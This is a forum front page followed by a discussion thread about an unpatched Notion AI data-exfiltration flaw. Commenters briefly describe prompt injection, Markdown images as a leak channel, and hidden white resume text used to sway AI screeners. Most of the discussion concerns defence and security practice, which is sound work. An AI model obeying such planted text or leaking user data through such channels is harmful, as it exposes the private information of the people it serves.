frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Start all of your commands with a comma (2009)

https://rhodesmill.org/brandon/2009/commands-with-comma/
233•theblazehen•2d ago•68 comments

OpenCiv3: Open-source, cross-platform reimagining of Civilization III

https://openciv3.org/
695•klaussilveira•15h ago•206 comments

Hoot: Scheme on WebAssembly

https://www.spritely.institute/hoot/
7•AlexeyBrin•1h ago•0 comments

The Waymo World Model

https://waymo.com/blog/2026/02/the-waymo-world-model-a-new-frontier-for-autonomous-driving-simula...
962•xnx•20h ago•555 comments

How we made geo joins 400× faster with H3 indexes

https://floedb.ai/blog/how-we-made-geo-joins-400-faster-with-h3-indexes
130•matheusalmeida•2d ago•35 comments

Unseen Footage of Atari Battlezone Arcade Cabinet Production

https://arcadeblogger.com/2026/02/02/unseen-footage-of-atari-battlezone-cabinet-production/
67•videotopia•4d ago•6 comments

Vocal Guide – belt sing without killing yourself

https://jesperordrup.github.io/vocal-guide/
54•jesperordrup•5h ago•25 comments

ga68, the GNU Algol 68 Compiler – FOSDEM 2026 [video]

https://fosdem.org/2026/schedule/event/PEXRTN-ga68-intro/
11•matt_d•3d ago•2 comments

Jeffrey Snover: "Welcome to the Room"

https://www.jsnover.com/blog/2026/02/01/welcome-to-the-room/
37•kaonwarb•3d ago•27 comments

Show HN: Look Ma, No Linux: Shell, App Installer, Vi, Cc on ESP32-S3 / BreezyBox

https://github.com/valdanylchuk/breezydemo
236•isitcontent•15h ago•26 comments

Monty: A minimal, secure Python interpreter written in Rust for use by AI

https://github.com/pydantic/monty
234•dmpetrov•16h ago•125 comments

Where did all the starships go?

https://www.datawrapper.de/blog/science-fiction-decline
33•speckx•3d ago•21 comments

UK infants ill after drinking contaminated baby formula of Nestle and Danone

https://www.bbc.com/news/articles/c931rxnwn3lo
12•__natty__•3h ago•0 comments

Show HN: I spent 4 years building a UI design tool with only the features I use

https://vecti.com
335•vecti•17h ago•147 comments

Hackers (1995) Animated Experience

https://hackers-1995.vercel.app/
502•todsacerdoti•23h ago•244 comments

Sheldon Brown's Bicycle Technical Info

https://www.sheldonbrown.com/
386•ostacke•21h ago•97 comments

Show HN: If you lose your memory, how to regain access to your computer?

https://eljojo.github.io/rememory/
300•eljojo•18h ago•186 comments

Microsoft open-sources LiteBox, a security-focused library OS

https://github.com/microsoft/litebox
361•aktau•22h ago•185 comments

An Update on Heroku

https://www.heroku.com/blog/an-update-on-heroku/
425•lstoll•21h ago•282 comments

PC Floppy Copy Protection: Vault Prolok

https://martypc.blogspot.com/2024/09/pc-floppy-copy-protection-vault-prolok.html
68•kmm•5d ago•10 comments

Dark Alley Mathematics

https://blog.szczepan.org/blog/three-points/
96•quibono•4d ago•22 comments

Was Benoit Mandelbrot a hedgehog or a fox?

https://arxiv.org/abs/2602.01122
21•bikenaga•3d ago•11 comments

The AI boom is causing shortages everywhere else

https://www.washingtonpost.com/technology/2026/02/07/ai-spending-economy-shortages/
19•1vuio0pswjnm7•1h ago•5 comments

How to effectively write quality code with AI

https://heidenstedt.org/posts/2026/how-to-effectively-write-quality-code-with-ai/
265•i5heu•18h ago•217 comments

Delimited Continuations vs. Lwt for Threads

https://mirageos.org/blog/delimcc-vs-lwt
33•romes•4d ago•3 comments

Introducing the Developer Knowledge API and MCP Server

https://developers.googleblog.com/introducing-the-developer-knowledge-api-and-mcp-server/
64•gfortaine•13h ago•28 comments

I now assume that all ads on Apple news are scams

https://kirkville.com/i-now-assume-that-all-ads-on-apple-news-are-scams/
1077•cdrnsf•1d ago•460 comments

Female Asian Elephant Calf Born at the Smithsonian National Zoo

https://www.si.edu/newsdesk/releases/female-asian-elephant-calf-born-smithsonians-national-zoo-an...
39•gmays•10h ago•13 comments

Understanding Neural Network, Visually

https://visualrambling.space/neural-network/
298•surprisetalk•3d ago•44 comments

I spent 5 years in DevOps – Solutions engineering gave me what I was missing

https://infisical.com/blog/devops-to-solutions-engineering
154•vmatsiiako•20h ago•72 comments
Open in hackernews

Notion AI: Unpatched data exfiltration

https://www.promptarmor.com/resources/notion-ai-unpatched-data-exfiltration
206•takira•1mo ago

Comments

jerryShaker•1mo ago
Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September
airstrike•1mo ago
IMHO the problem really comes from the browser accessing the URL without explicit user permission.

Bring back desktop software.

embedding-shape•1mo ago
Meh, bring back thinking of security regardless of the platform instead. The web is gonna stay, might as well wish for people to treat the security on the platform better.
rdli•1mo ago
Securing LLMs is just structurally different. The attack space is "the entirety of the human written language" which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.

In general, treating LLM outputs (no matter where) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging) is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.

vmg12•1mo ago
It's pretty simple, don't give llms access to anything that you can't afford to expose. You treat the llm as if it was the user.
rdli•1mo ago
I get that but just not entirely obvious how you do that for the Notion AI.
embedding-shape•1mo ago
Don't use AI/LLMs that have unfettered access to everything?

Feels like the question is "How do I prevent unauthenticated and anonymous users to use my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.

whateveracct•4w ago
exactly?
solid_fuel•4w ago
> You treat the llm as if it was the user.

That's not sufficient. If a user copies customer data into a public google sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.

kahnclusions•1mo ago
I’m not convinced LLMs can ever be secured, prompt injection isn’t going away since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
Barrin92•1mo ago
Dijkstra, On the Foolishness of "natural language programming":

[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]

If only we had a way to tell a computer precisely what we want it to do...

https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...

jcims•1mo ago
As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the anthropic paper on subliminal learning [1] was a bit eye opening in this regard) and subsequently have no deterministic way to protect it.

1 - https://alignment.anthropic.com/2025/subliminal-learning/

zbentley•4w ago
I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.

We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.

Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.

solid_fuel•4w ago
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and multiply it against untrusted input from the users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.

The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer and any calls out of the system must be seen as potential data leaks - including web searches, GET requests, emails, anything.

You can still do useful things under that restriction but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.

falloutx•1mo ago
People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you, There are also resume collecting services which let you buy a set of resumes belonging to your general competition era and you can compare your ai results with them. Its an arms race to get called up for a job interview at the moment.
Terr_•1mo ago
I wouldn't be surprised if people tried to document what LLMs different companies/vendors are using, in order to take advantage of model-biases.

https://nyudatascience.medium.com/language-models-often-favo...

AdieuToLogic•1mo ago
> People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you ...

I would caution against using "white hidden text" within PDF resumes as all an ATS[0] need use in order to make hidden text the same as any other text is preprocess with the poppler[1] project's `pdftotext`. Sophisticated ATS[0] offerings could also use `pdftotext` in a fraud detection role with other document formats as well.

0 - https://en.wikipedia.org/wiki/Applicant_tracking_system

1 - https://poppler.freedesktop.org/

jonplackett•1mo ago
Sloppy coding to know a link could be a problem and render it anyway. But even worse to ignore the person who tells you you did that.
mirekrusin•1mo ago
Public disclosure date is Jan 2025, but should be Jan 2026.
dcreater•1mo ago
One more reason not to use Notion.

I wonder when there will be awakening to not use SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the bay area.

I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.

bossyTeacher•1mo ago
> I think the next wave is going to be native apps

elaborate please?

dcreater•4w ago
The reason web apps and electron based apps became the de facto standard was that it removed the pain of building separately for each platform. A cost that understandably devs and companies want to avoid. Many years of this phenomenon also meant that TS/JS skills are widely available in the market but C/Swift etc. are relatively rare. LLMs completely upend this status quo as they can write in whatever language you want them to and perhaps more powerfully, can rewrite any app into whatever target language you want at effectively 0 cost/time. So a dev can decide to write in Swift for mac and ask LLMs to make a Windows version and so forth.
jrm4•1mo ago
This, of course, more yelling into the void from decades ago, but companies who promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet effectively figured out how to do that yet. Not sure what it will take.
pluralmonad•1mo ago
Its perfectly figured out, people just refuse to implement the solution. Stop giving your resources to the bad actors. The horrible behavior so many enable in order to not be inconvenienced is immense.
jrm4•4w ago
Perfectly? No. No. A million times no.

You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.

NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.

someguyiguess•1mo ago
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
dtkav•1mo ago
How was the migration process?

I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.

crashabr•1mo ago
I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but

1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

2) Don't you expect to be sherlocked by the obsidian team?

embedding-shape•1mo ago
> 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

More or less yes, embeddable templates basically gives you that out of the box, Obsidian "Bases" let you query them.

> 2) Don't you expect to be sherlocked by the obsidian team?

I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.

And after all, Obsidian is a for-profit company who can change their mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.

dtkav•4w ago
From their roadmap page:

> Multiplayer > > Share notes and edit them collaboratively

https://obsidian.md/roadmap

embedding-shape•4w ago
Doesn't say real-time there though? But yeah, must be what they mean, because you can in theory already collaborate on notes, via their "Sync", although it sucks for real-time collaboration.
dtkav•4w ago
In Obsidian you can have transclusions which is basically an embed of a section of another note. It isn't perfect, but worth looking into.

Regarding getting sherlocked; Obsidian does have realtime collaboration on their roadmap. There are likely to be important differences in approach, though.

Our offering is available now and we're learning a ton about what customers want.

If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business and are around the state of the art of a philosophy of software.

I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).

That vision is inherently collaborative, anti lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).

someguyiguess•3w ago
Sorry for the late reply. The migration was really easy actually. I used the official migration plugin. There were a few things it couldn’t transfer over though (voice transcription notes)
dtkav•2w ago
Very helpful, thank you.
brimtown•1mo ago
This is @simonw’s Lethal Trifecta [1] again - access to private data and untrusted input are arguably the purpose of enterprise agents, so any external communication is unsafe. Markdown images are just the ones people usually forget about

[1] https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

Miyamura80•1mo ago
Good point around the markdown image as an untrusted vector. Lethal trifecta is determnistically preventable, it really should be addressed wider in the indutry
noleary•1mo ago
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
hxugufjfjf•1mo ago
As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.
digiown•4w ago
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer grade service without an explicit contract for any important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.